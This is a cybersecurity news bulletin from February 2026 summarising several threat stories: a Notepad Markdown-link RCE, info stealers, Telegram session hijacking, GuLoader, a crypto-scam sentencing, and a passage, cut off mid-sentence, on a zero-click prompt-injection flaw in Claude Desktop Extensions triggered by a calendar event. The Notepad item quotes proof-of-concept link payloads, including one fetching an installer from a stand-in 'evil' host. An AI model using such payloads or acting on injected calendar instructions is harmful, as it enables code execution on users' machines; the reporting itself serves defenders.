ThreatsDay Bulletin: AI Prompt RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days & 25+ Stories  Ravie Lakshmanan  Feb 12, 2026 Cybersecurity / Hacking News Threat activity this week shows one consistent signal — attackers are leaning harder on what already works. Instead of flashy new exploits, many operations are built around quiet misuse of trusted tools, familiar workflows, and overlooked exposures that sit in plain sight. Another shift is how access is gained versus how it’s used. Initial entry points are getting simpler, while post-compromise activity is becoming more deliberate, structured, and persistent. The objective is less about disruption and more about staying embedded long enough to extract value. There’s also growing overlap between cybercrime, espionage tradecraft, and opportunistic intrusion. Techniques are bleeding across groups, making attribution harder and defense baselines less reliable. Below is this week’s ThreatsDay Bulletin — a tight scan of the signals that matter, distilled into quick reads. Each item adds context to where threat pressure is building next. Notepad RCE via Markdown Links Microsoft Patches Notepad Flaw Microsoft has patched a command injection flaw ( CVE-2026-20841 , CVSS score: 8.8) in its Notepad app that could result in remote code execution. "Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network," Microsoft said. An attacker could exploit this flaw by tricking a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to run remote files. "The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user," the tech giant added. Proof-of-concept (PoC) exploits show that the vulnerability can be triggered by creating a Markdown file with "file://" links that point to executable files ("file://C:/windows/system32/cmd.exe") or contain special URIs ("ms-appinstaller://?source=https://evil/xxx.appx") to run arbitrary payloads. The issue was fixed as part of its monthly Patch Tuesday update this week. Microsoft added Markdown support to Notepad on Windows 11 last May. APT Pressure Intensifies on Taiwan Taiwan Becomes Target of APT Attacks TeamT5 said tracked more than 510 advanced persistent threat (APT) operations affecting 67 countries globally in 2025, out of which 173 attacks targeted Taiwan. "Taiwan’s role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives," the security vendor said . "Taiwan is more than just a target – it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments." Node.js Stealer Hits Windows LTX Stealer Targets Windows Systems A new Node.js information stealer named LTX Stealer has been spotted in the wild. Targeting Windows systems and distributed via a heavily obfuscated Inno Setup installer, the malware conducts large-scale credential harvesting from Chromium-based browsers, targets cryptocurrency-related artifacts, and stages the collected data for exfiltration. "The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details," CYFIRMA said . Marco Stealer Expands Data Theft Marco Stealer Emerges in the Wild Another new Windows-oriented information stealer is Marco Stealer, which was first observed in June 2025. Delivered via a downloader in a ZIP archive, it mainly targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim's system. "Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker," Zscaler ThreatLabz said . "Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests." Telegram Sessions Hijacked via OAuth Abuse Social Engineering Campaign Targets Telegram Accounts A new account takeover campaign has been observed abusing Telegram's native authentication workflows to obtain fully authorized user sessions. In one variant, victims are prompted to scan a QR code on bogus sites using the Telegram mobile application, initiating a legitimate Telegram login attempt tied to attacker-controlled API credentials. Telegram then sends an in-app authorization prompt to the victim's existing session. Alternatively, users can also enter their country code, phone number, and verification code (if enabled) on a fake web page, which causes the data to be relayed to Telegram's official authentication APIs. Upon successful verification, Telegram issues an in-app authorization request as before. "Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram's legitimate login and authorization infrastructure," CYFIRMA noted . "By inducing victims to approve in-app authorization prompts under false pretenses, the attackers achieve complete session compromise while minimizing technical anomalies and user suspicion." Discord Expands Global Age Checks Discord Announces Age Verification Plans Discord has announced it will require all users globally to verify their ages by sharing video selfies or providing government IDs to access certain content. Additionally, it will implement an age inference model, a new system that runs in the background to help determine whether an account belongs to an adult, without always requiring users to verify their age. The company has assured that video selfies don't leave a user's device, that identity documents submitted to third-party vendors, in this case k-ID, are "deleted quickly" or "immediately" after age confirmation, and that a user's age verification status cannot be seen by other users. However, concerns have been raised about whether Discord can be trusted with their most sensitive information, especially in the aftermath of a security breach of a third-party service that Discord previously relied on to verify ages in the U.K. and Australia. The incident led to the theft of government IDs of 70,000 Discord users. In a statement given to Ars Technica, k-ID said the age estimation technology runs entirely on device and no third-parties store personal data shared during age checks. The move comes at a time when laws requiring age verification on social media platforms are being adopted across the world. Discord confirmed that "a phased global rollout" would begin in "early March," at which point all users globally would be defaulted to “teen-appropriate" experiences. GuLoader Refines Evasion Tradecraft GuLoader Continues to Evolve A new analysis of the GuLoader malware has revealed that it employs polymorphic code to dynamically construct constants during execution and exception-based control flow obfuscation to conceal its functionality and evade detection. Besides introducing sophisticated exception-handling mechanisms to complicate analysis, the malware attempts to bypass reputation-based rules by hosting payloads on trusted cloud services such as Google Drive and OneDrive. First observed in December 2019, GuLoader serves primarily as a downloader for Remote Access Trojans (RATs) and information stealers. $73.6M Pig-Butchering Scam Sentence Man Sentenced to 20 Years in Prison for Crypto Scam Daren Li, 42, a dual national of China and St. Kitts and Nevis has been sentenced in absentia in the U.S. to the statutory maximum of 20 years in prison and three years of supervised release for his international cryptocurrency investment scheme known as pig butchering or romance baiting that defrauded victims of more than $73.6 million. Li pleaded guilty to his crime in November 2024. However, the defendant cut off his ankle monitor and fled the country in December 2025. His present whereabouts are unknown. "As part of his plea agreement, Li admitted that unindicted members of the conspiracy would contact victims directly through unsolicited social-media interactions, telephone calls and messages, and online dating services," the U.S. Justice Department said . "The unindicted co-conspirators would gain the trust of victims by establishing either professional or romantic relationships with them, often communicating by electronic messages sent via end-to-end encrypted applications." The co-conspirators established spoofed domains and websites that resembled legitimate cryptocurrency trading platforms and tricked victims into investing in cryptocurrency through these fraudulent platforms after gaining their trust. Li also confessed that he would direct co-conspirators to open U.S. bank accounts established on behalf of 74 shell companies and would monitor the receipt of interstate and international wire transfers of victim funds. "Li and other co-conspirators would receive victim funds in financial accounts that they controlled and then monitor the conversion of victim funds to virtual currency," the department said. 0-Click AI Prompt RCE Risk 0-Click Flaw in Claude Desktop Extensions A zero-click remote code execution vulnerability (CVSS score: 10.0) in Claude Desktop Extensions (DXT) could be exploited to silently compromise a system by a simple Google Calendar event when a user issues a harmless prompt like "Please check my latest events in google cal[endar] and then take care of it for me." The problem stems from how MCP